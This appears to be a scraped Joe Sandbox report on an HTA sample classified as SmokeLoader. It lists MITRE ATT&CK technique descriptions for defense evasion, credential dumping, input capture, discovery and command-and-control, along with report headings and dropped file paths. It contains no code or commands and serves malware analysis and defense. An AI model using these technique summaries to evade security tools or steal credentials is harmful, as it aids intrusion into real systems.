Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report veryeasythingsevermadeforcreatenewthignsbetterthigns.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_eb4ecc53-8d1a-4566-8315-db5a6648e01a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DBD.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E89.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6ED8.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wihaduv.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestthingsentiretimewithgreatthignstoebe[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\566C.tmp

Windows Analysis Report
veryeasythingsevermadeforcreatenewthignsbetterthigns.hta

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre